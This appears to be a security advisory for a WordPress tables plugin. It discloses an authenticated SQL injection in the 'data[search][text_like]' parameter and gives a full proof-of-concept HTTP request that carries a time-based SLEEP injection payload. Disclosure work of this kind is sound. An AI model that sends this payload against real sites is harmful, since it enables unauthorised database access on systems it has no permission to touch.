The POST parameter "data[search][text_like]" was used in a SQL statement without being sanitised when searching for Tables in the dashboard, leading to an authenticated SQL Injection issue.
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: YOLO Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://example.com/wp-admin/admin.php?page=supsystic-tables&module=tables&nonce=6cda51eefd Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 336 Origin: https://example.com Connection: close Cookie: [admin cookies] route%5Bmodule%5D=tables&route%5Baction%5D=getListForTbl&route%5Bnonce%5D=6cda51eefd&data%5Bsearch%5D%5Btext_like%5D=aa'%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)%20AND%20'42'='42&data%5B_search%5D=false&data%5Bnd%5D=1612792425884&data%5Brows%5D=10&data%5Bpage%5D=0&data%5Bsidx%5D=id&data%5Bsord%5D=desc&action=supsystic-tables
2021-02-08 (about 2 years ago)
2021-02-08 (about 2 years ago)
2021-02-10 (about 2 years ago)